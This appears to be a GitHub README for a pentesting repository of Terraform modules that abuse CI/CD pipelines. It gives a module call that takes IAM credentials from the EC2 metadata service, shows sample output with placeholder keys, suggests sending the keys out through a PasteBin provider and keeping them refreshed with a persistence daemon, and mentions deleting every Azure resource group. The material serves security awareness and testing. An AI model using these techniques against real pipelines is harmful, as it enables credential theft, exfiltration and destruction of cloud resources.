/terraform-deployment-pentesting

Bits of Terraform that you can use to do bad things in CI/CD pipelines that run Terraform

Primary LanguageHCL

terraform-deployment-pentesting

This is a collection of tiny Terraform modules that can be used to do dangerous things in a CI/CD pipeline.

Terraform over CI/CD is basically RCE-as-a-service by design, so it's important to be aware of different security risks that can occur when designing an acceptable Terraform deployment setup.

This repository is not meant to provide an exhaustive list of defensive measures. It is only meant to provide a good laugh and increased awareness of what exactly you can do if you're a developer who can commit to repositories that kick off Terraform builds.

Grabbing EC2 Credentials

If you run this on an EC2 instance with a privileged role attached, it will return credentials.

module "get_creds" {
  source               = "github.com/kmcquade/terraform-deployment-pentesting.git?ref=master//grab-creds-from-ec2-metadata/"
  is_local_environment = false
}

Response:

$ terraform apply -auto-approve

data.http.role_name: Refreshing state... [id=http://localhost:1338/latest/meta-data/iam/security-credentials/]
data.http.credentials: Refreshing state... [id=http://localhost:1338/latest/meta-data/iam/security-credentials/baskinc-role]

Apply complete! Resources: 0 added, 0 changed, 0 destroyed.

Outputs:

credentials = {
        "Code": "Success",
        "LastUpdated": "2020-04-02T18:50:40Z",
        "Type": "AWS-HMAC",
        "AccessKeyId": "12345678901",
        "SecretAccessKey": "v/12345678901",
        "Token": "TEST92test48TEST+y6RpoTEST92test48TEST/8oWVAiBqTEsT5Ky7ty2tEStxC1T==",
        "Expiration": "2020-04-02T00:49:51Z"
}

You can then access the attributes of the module like module.get_creds.access_key, module.get_creds.secret_access_key, and module.get_creds.session_token and upload those credentials to wherever you want. For example, you could upload those access keys to the PasteBin provider.

Of course, you could also do a bunch of crazy stuff like creating a daemon service on the machine using the local_file provider and bash commands, and then refresh those credentials every 15 minutes.

Nuking every Azure Resource Group in Every Azure subscription

Note: An assumption in this case is that you are using the same service principal per Terraform pipeline build.

This content is covered in my blog here: https://kmcquade.com/2020/11/nuking-all-azure-resource-groups-under-all-azure-subscriptions/.

More will be added soon.